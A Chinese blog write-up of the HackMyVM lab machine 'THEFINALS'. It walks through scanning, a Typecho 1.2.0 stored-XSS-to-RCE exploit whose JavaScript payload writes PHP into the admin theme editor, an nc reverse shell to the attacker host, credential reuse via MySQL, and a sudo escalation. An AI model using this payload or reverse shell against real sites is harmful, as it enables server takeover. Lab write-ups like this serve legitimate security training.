HackMyVM-THEFINALS

大佬群友做的靶机。关于如何设置VM和virtualbox联动网上已经有很详细的教程了,这里不再赘述。只提一点,一定要确保靶机环境完全启动之后再进行前期的准备工作(血的教训啊),不过群友做的靶机都很友好,IP直接给了不用arpscan费事扫。

信息收集

靶机ip:192.168.56.105

nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
nmap -T4 -A -v 192.168.56.105
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 11:11 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating ARP Ping Scan at 11:11
Scanning 192.168.56.105 [1 port]
Completed ARP Ping Scan at 11:11, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:11
Completed Parallel DNS resolution of 1 host. at 11:11, 0.03s elapsed
Initiating SYN Stealth Scan at 11:11
Scanning 192.168.56.105 [1000 ports]
Discovered open port 22/tcp on 192.168.56.105
Discovered open port 80/tcp on 192.168.56.105
Completed SYN Stealth Scan at 11:11, 0.10s elapsed (1000 total ports)
Initiating Service scan at 11:11
Scanning 2 services on 192.168.56.105
Completed Service scan at 11:11, 6.08s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 192.168.56.105
NSE: Script scanning 192.168.56.105.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.27s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.01s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Nmap scan report for 192.168.56.105
Host is up (0.00076s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.9 (protocol 2.0)
| ssh-hostkey: 
|   256 42:a7:04:bb:da:b5:8e:71:7a:89:ff:a4:60:cd:4d:29 (ECDSA)
|_  256 37:32:71:ca:3f:11:41:b4:d7:90:1e:c9:7f:e8:bc:20 (ED25519)
80/tcp open  http    Apache httpd 2.4.62 ((Unix))
|_http-title: THE FINALS
|_http-server-header: Apache/2.4.62 (Unix)
| http-methods: 
|   Supported Methods: GET POST OPTIONS HEAD TRACE
|_  Potentially risky methods: TRACE
MAC Address: 08:00:27:BD:74:14 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Uptime guess: 22.031 days (since Tue May  6 10:27:15 2025)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.76 ms 192.168.56.105

NSE: Script Post-scanning.
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Initiating NSE at 11:11
Completed NSE at 11:11, 0.00s elapsed
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.36 seconds
           Raw packets sent: 1023 (45.806KB) | Rcvd: 1015 (41.286KB)

dirsearch:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Target: http://192.168.56.105/

[11:14:29] Starting:                                                                                                                    
[11:14:29] 301 -  311B  - /js  ->  http://192.168.56.105/js/                
[11:14:30] 403 -  277B  - /.ht_wsr.txt                                      
[11:14:30] 403 -  277B  - /.htaccess.orig                                   
[11:14:30] 403 -  277B  - /.htaccess.bak1
[11:14:30] 403 -  277B  - /.htaccess.sample
[11:14:30] 403 -  277B  - /.htaccess.save
[11:14:30] 403 -  277B  - /.htaccess_extra                                  
[11:14:30] 403 -  277B  - /.htaccess_orig
[11:14:30] 403 -  277B  - /.htaccess_sc                                     
[11:14:30] 403 -  277B  - /.htaccessBAK
[11:14:30] 403 -  277B  - /.htaccessOLD
[11:14:30] 403 -  277B  - /.htaccessOLD2
[11:14:30] 403 -  277B  - /.htm                                             
[11:14:30] 403 -  277B  - /.html                                            
[11:14:30] 403 -  277B  - /.htpasswd_test                                   
[11:14:30] 403 -  277B  - /.htpasswds
[11:14:30] 403 -  277B  - /.httr-oauth
[11:14:37] 301 -  313B  - /blog  ->  http://192.168.56.105/blog/            
[11:14:37] 200 -   17KB - /blog/                                            
[11:14:37] 200 -  820B  - /cgi-bin/printenv                                 
[11:14:37] 200 -    1KB - /cgi-bin/test-cgi                                 
[11:14:38] 301 -  312B  - /css  ->  http://192.168.56.105/css/              
[11:14:40] 301 -  314B  - /fonts  ->  http://192.168.56.105/fonts/          
[11:14:41] 200 -  607B  - /images/                                          
[11:14:41] 301 -  315B  - /images  ->  http://192.168.56.105/images/
[11:14:42] 200 -  695B  - /js/                                              
[11:14:47] 301 -  320B  - /screenshots  ->  http://192.168.56.105/screenshots/
[11:14:52] 403 -  277B  - /server-status/                                   
[11:14:52] 403 -  277B  - /server-status

开放80端口,扫到的可访问界面不少,浏览器挨个访问一下。

这些图片点进去只是图片,没什么隐写之类的,另外两个点进去也都无法访问。

访问/images,看到这里是存放图片的目录,没有其他东西,apache版本2.462,也没有洞可以打。

之后访问/screenshots,终于有了一点起色,这里的截屏显示了一个博客框架的名称和版本号。

访问/blog,看出这个网站是用的上面提到的框架搭建的,很明显是让我们找这里的exp。

Getshell

搜索Typecho 1.2.0,得到exp:

typecho存储型xss漏洞复现_存储型xss漏洞无交互-CSDN博客

Typecho1.2 - 1.2.1-rc前台评论存储xss到rce 漏洞复现-分析-修复 - JunBlog

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
// 定义一个函数,在网页末尾插入一个iframe元素
function insertIframe() {
    // 获取当前页面路径
    var urlWithoutDomain = window.location.pathname;
    // 判断页面是否为评论管理页面
    var hasManageComments = urlWithoutDomain.includes("manage-comments.php");
    var tSrc='';
    if (hasManageComments){
        // 如果是,则将路径修改为用于修改主题文件的页面地址
        tSrc=urlWithoutDomain.replace('manage-comments.php','theme-editor.php?theme=default&file=404.php');
    }else{
        // 如果不是,则直接使用主题文件修改页面地址
        tSrc='/admin/theme-editor.php?theme=default&file=404.php';
    }
    // 定义iframe元素的属性,包括id、src、width、height和onload事件
    var iframeAttributes = "<iframe id='theme_id' src='"+tSrc+"' width='0%' height='0%' onload='writeShell()'></iframe>";
    // 获取网页原始内容
    var originalContent = document.body.innerHTML;
    // 在网页末尾添加iframe元素
    document.body.innerHTML = (originalContent + iframeAttributes);
}

// 定义一个全局变量isSaved,初始值为false
var isSaved = false;

// 定义一个函数,在iframe中写入一段PHP代码并保存
function writeShell() {
    // 如果isSaved为false
    if (!isSaved) { 
        // 获取iframe内的内容区域和“保存文件”按钮元素
        var content = document.getElementById('theme_id').contentWindow.document.getElementById('content');
        var btns = document.getElementById('theme_id').contentWindow.document.getElementsByTagName('button');    
        // 获取模板文件原始内容
        var oldData = content.value;
        // 在原始内容前加入一段phpinfo代码
        content.value = ('<?php phpinfo(); ?>\n') + oldData;
        // 点击“保存文件”按钮
        btns[1].click();
        // 将isSaved设为true,表示已经完成写入操作
        isSaved = true;
    }
}
// 调用insertIframe函数,向网页中添加iframe元素和写入PHP代码的事件
insertIframe();
1
http://xxx.xxx.com/"></a><script/src=http://192.168.56.104:8000/shell.js></script><a/href="#

点开文章进行评论,看到我们已经成功上传了文件。

查看exp中的地址/usr/blog/theme/default/404.php,我们成功执行了phpinfo。

那接下来就是爽爽的getshell了,传个post一句话冰蝎爽连……好吧爽连不了,不知道怎么回事,只能反弹shell了。

但是bash没反应。

把exp改一下改成read /etc/passwd,查看靶机用的shell名,用的是ash。

1
content.value = ('<?php exec("nc 192.168.56.104 9000 -e /bin/ash"); ?>\n') + oldData;

查看内部用户名

june用户目录是任意用户可访问的,cd到他的目录下拿到userflag

1
user:flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}

提权

再回到我们一开始拿到shell的目录下,find一下看看有没有能利用的提权文件,看了一下没有,但是目录下有一个config.php,内容是mysql的用户配置,于是想到利用mysql登录获取数据库里的信息。

给了user,passwd,database,db的权限也写好了,直接登录就好。

1
mysql -u typecho_u -pQLTkbviW71CSRZtGWIQ

这里用nc反弹的盲shell登录mysql老是延迟回显,只有在exit的情况下会把表显示出来,气不过回头重新用pty登了一次。

1
pty是一个python库,用于模拟终端登录过程,渗透测试中常用于升级盲shell,欺骗命令让它们以为自己在正确的终端中被执行

ok我们把上面staff用户的哈希拿到了,hashcat启动。

莫得。

只能再回到shell里,刚刚find查询perm没有结果,那这一次看一看各自用户有没有什么文件可以利用。

通过查询用户scotty拥有的文件发现了一个日志文件。

1
find / -user scotty 2>/dev/null
1
/var/log/scotty-main.log

查看日志,全是给192.168.11.255的广播信息。

用nc本地监听1337端口,拿到一串不知道是什么的字符串,不过肯定是编码过了。

赛博厨子magic一下,结果这是用户的私钥文件,结合刚刚的信息,可以ssh登scotty了。

1
2
3
4
5
6
7
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAAAMwAAAAtzc2gtZW
QyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEwAAAJgDc/YUA3P2
FAAAAAtzc2gtZWQyNTUxOQAAACA1wn094phOqsfbo+o3CBYiN3xA16ymKSbX2UY32x/AEw
AAAECv7kfeoXOQCi5CRIWdHiDT5upKyY3vQxAlKmxEQzRZLDXCfT3imE6qx9uj6jcIFiI3
fEDXrKYpJtfZRjfbH8ATAAAAEnJvb3RAdGhlZmluYWxzLmhtdgECAw==
-----END OPENSSH PRIVATE KEY-----

Root

看一下这个用户有什么权限

1
2
3
4
5
6
7
8
9
thefinals:~$ sudo -l
Matching Defaults entries for scotty on thefinals:
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

Runas and Command-specific defaults for scotty:
    Defaults!/usr/sbin/visudo env_keep+="SUDO_EDITOR EDITOR VISUAL"

User scotty may run the following commands on thefinals:
    (ALL) NOPASSWD: /sbin/secret

好吧,nopasswd只有一个,那就用吧。

1
2
thefinals:~$ sudo /sbin/secret
/sbin/secret: line 2: can't create /dev/pts/99: Permission denied

谔谔你让我创建到第99个shell吗,那很有手速了。

编写脚本

1
for i in $(seq 1 90); do python -c 'import pty; pty.spawn("/bin/ash")' & done

之后再次执行

1
2
~ $ sudo /sbin/secret
root:p8RuoQGTtlKLAjuF1Tpy5wX

终于拿到root密码了,ssh爽连……不了。

原来是mysql的密码。

使用root账户就可以访问secret数据库了,从user表中拿到真的root密码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
Database changed
MariaDB [typecho_db]> use secret;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [secret]> show tables;
+------------------+
| Tables_in_secret |
+------------------+
| user             |
+------------------+
1 row in set (0.000 sec)

MariaDB [secret]> select * from user;
+----+----------+-------------------------+
| id | username | password                |
+----+----------+-------------------------+
|  1 | root     | BvIpFDyB4kNbkyqJGwMzLcK |
+----+----------+-------------------------+
1 row in set (0.000 sec)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
thefinals:~# cat root.flag 
 _____      __   __      ______
/\  __\    /\ "-.\ \    /\  ___\
\ \ \___   \ \ \-.  \   \ \___  \
 \ \____\   \ \_\\"\_\   \ \_____\
  \/____/    \/_/ \/_/    \/_____/

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}

thefinals:~# cat note.txt 
ssh://root@thefinals.hmv:BvIpFDyB4kNbkyqJGwMzLcK
ssh://staff@thefinals.hmv:qDCsBTj30cQyityMh3Rnyys
ssh://june@thefinals.hmv:aYTmcORsUrmwaKa7C2DBLCh
ssh://scotty@thefinals.hmv:uuUoqAETern4v5tW2iMFs47

mariadb://root@localhost:p8RuoQGTtlKLAjuF1Tpy5wX

mariadb://typecho_u@typecho_db@localhost:QLTkbviW71CSRZtGWIQdB6s

typecho://staff@thefinals.hmv:n3nPbqEOhs6eTcchyqXTXWi
typecho://june@thefinals.hmv:DihPQiQqNO75vv8zNBzLwUm

flag{4b5d61daf3e2e5ba57019f617012ad0919c2a6c29e11912aeadef2820be8f298}
canyoureachthefinals -> sha256

flag{8c5daa407626d218e962041dd8fd8f37913e56e32a6f06725da403175be0b9ff}
youfinallyreachedthefinals -> sha256

THE FINALS is a great FPS game. A lot of inspiration comes from games. Try it on http://reachthefinals.com/

这个靶机打的还是挺爽的,XSS漏洞一直不是很懂,通过这一次复习了一下。

嗯这边我不知道那个xss利用是不是只能反弹shell,当时我想写一句话马用蚁剑或者冰蝎连但是老连不上,但是上面博客里的exp是有用post实现rce的复现的,可能这个靶机是做了些限制还是什么。

之后我看了LingMJ大佬的wp,发现他就是用的蚁剑练的post马,只是连接密码不一样,所以应该不是靶机的问题,可能我这边写入shell的方式有点问题吧。

#渗透 #HVM
HackMyVM-THEFINALS
http://example.com/2025/05/28/HackMyVM-THEFINALS/
Author
Skyarrow
Posted on
May 28, 2025
Licensed under